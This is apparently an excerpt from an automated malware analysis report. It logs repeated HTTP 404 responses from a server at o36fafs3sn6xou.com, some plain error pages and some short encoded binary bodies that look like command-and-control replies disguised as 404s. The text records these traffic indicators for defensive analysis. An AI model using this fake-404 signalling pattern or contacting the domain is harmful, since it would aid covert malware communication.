Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 46Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 40 b2 d0 f6 a0 e0 54 18 e8 86 65 a4 ac 45 75 9c e3 87 bb 32 b1 8c 84 f2 68 b9 46 Data Ascii: %S`Nh&WQL@TeEu2hF
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 48Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 d5 f9 72 b4 a6 8a f3 4c ef 46 86 aa Data Ascii: %S`Nh&WQY^L8?rLF
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:14 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e3 8c ac f0 ba 1e 46 af c4 32 fe b4 1e 35 9c a5 93 f3 3b ae 91 9d e5 23 a4 5b 9b Data Ascii: %S`Nh&WQY^F25;#[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:20 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:21 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 79Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 92 c7 2b 8c b9 b8 f3 3c f8 42 c9 f6 0c 7d db 77 57 8f 4a 65 e0 98 93 4b da fb 1e c9 90 cf e1 69 ff 0e 61 af 80 f3 b2 a3 c2 26 a1 Data Ascii: %S`Nh&WQY^L8?+<B}wWJeKia&
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 39Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 49 b2 cd ea a5 ee 54 18 ec 87 65 a7 ab 4b 75 c0 a4 83 ec 24 Data Ascii: %S`Nh&WQLITeKu$
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:26 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:27 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 85Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e8 87 b6 b8 e7 4a 1d f2 d1 25 fa f4 1b 33 9d ef 95 ba 22 b1 8d df eb 3d ae 1a 90 ac 21 2e c6 23 1e dd 18 36 e6 98 91 4b d3 b3 18 c6 c7 93 bc 6f f0 53 66 aa 99 c7 cd c8 e1 0d 80 6c e6 3f ec 8d a5 Data Ascii: %S`Nh&WQY^J%3"=!.#6KoSfl?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:27 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 31Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e fe cd ac fa f9 4c 6f ac c5 03 d4 Data Ascii: %S`Nh&WQY^Lo
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 70Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba fe 18 39 9e ee 83 e6 70 e7 d8 c9 f3 5a a0 4f 92 aa 1c 33 cd 72 46 c1 46 67 b9 cf 88 31 91 e7 59 84 94 cf aa 3e b0 0e Data Ascii: %S`Nh&WQY^&9pZO3rFFg1Y>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:30 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:31 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:31 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 70Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba fe 18 39 9e ee 83 e6 70 e7 d8 c9 f3 5a a0 4f 92 aa 1c 33 cd 72 46 c1 46 67 b9 cf 88 31 91 e7 59 84 94 cf aa 3e b0 0e Data Ascii: %S`Nh&WQY^&9pZO3rFFg1Y>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an 